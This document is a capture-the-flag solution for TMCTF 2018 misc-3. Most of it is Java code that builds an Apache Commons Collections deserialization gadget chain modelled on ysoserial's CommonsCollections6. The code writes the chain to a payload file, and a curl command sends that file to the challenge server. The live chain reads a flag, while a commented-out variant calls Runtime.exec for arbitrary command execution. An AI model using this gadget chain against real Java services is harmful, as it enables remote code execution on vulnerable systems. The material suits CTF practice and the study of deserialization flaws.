TMCTF 2018 misc-3

test.java

import java.io.*;
import java.util.*;
import javax.servlet.ServletInputStream;

import com.trendmicro.CustomOIS;
import com.trendmicro.Person;
import com.trendmicro.jail.Flag;

import org.apache.commons.collections.Factory;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import java.lang.reflect.Field;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;

import javax.management.BadAttributeValueExpException;

import sun.reflect.ReflectionFactory;

public class test {

    public static ServletInputStream createServletInputStream2(ByteArrayOutputStream baos) {
        final InputStream bais = new ByteArrayInputStream(baos.toByteArray());

        return new ServletInputStream() {

            @Override
            public int read() throws IOException {
                return bais.read();
            }
        };
    }

    public static Serializable getObject(final String command) throws Exception {

        final String[] execArgs = new String[] { command };

        /*
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, execArgs),
                new ConstantTransformer(1) };
        */

        final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(new Flag()),
            new InvokerTransformer(
                "getFlag",
                new Class[] {},
                new Object[] {}),
            new ConstantTransformer("zzz")
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        /*
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);
        */

        HashMap map = new HashMap();
        map.put("foo", "bar");
        HashMap innimpl = map;

        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }


        f2.setAccessible(true);
        Object[] array = (Object[]) f2.get(innimpl);

        Object node = array[0];
        if(node == null){
            node = array[1];
        }
        System.out.println("node=" + array);
        System.out.println("node=" + array.length);
        for (int i = 0; i < array.length; i++) {
            System.out.println("array " + i + " " + array[i]);
        }
        System.out.println("node=" + node);
        node = array[7];

        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        keyField.setAccessible(true);
        keyField.set(node, entry);

        return map;

    }

    public static void main(String[] args) {
        try {
            Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(new Flag()),
                new InvokerTransformer(
                    "getFlag",
                    new Class[] {},
                    new Object[] {}),
                new ConstantTransformer("zzz")
            };
            final Transformer transformerChain = new ChainedTransformer(transformers);


            final Map<String, String> map =
                LazyMap.decorate(new HashMap<>(), transformerChain);
            //map.get("xx");

            System.out.println("flag: ");
            //Flag.getFlag();

            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(baos);
            //oos.writeObject(new Integer(1234));
            //oos.writeObject(new Flag());
            //oos.writeObject(map);
            //oos.writeObject(new Person("foobar"));
            //oos.writeObject(new Mine());
            oos.writeObject(getObject("dummy"));

            FileOutputStream fos = new FileOutputStream("payload");
            fos.write(baos.toByteArray());
            fos.close();

            System.out.println("go");
            //ServletInputStream sis = createServletInputStream("foo", "utf-8");
            ServletInputStream sis = createServletInputStream2(baos);
            CustomOIS cois = new CustomOIS(sis);
            Object o = cois.readObject();
            System.out.println("result: " + o);
        } catch (IOException ios) {
            System.out.println("" + ios);
        } catch (ClassNotFoundException e) {
            System.out.println("" + e);
        } catch (Exception e) {
            System.out.println("" + e);
        }
    }
}

Reference: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections6.java

Run this Java code and

$ curl --data-binary '@payload' http://theflagmarshal.us-east-1.elasticbeanstalk.com/jail | grep TMCTF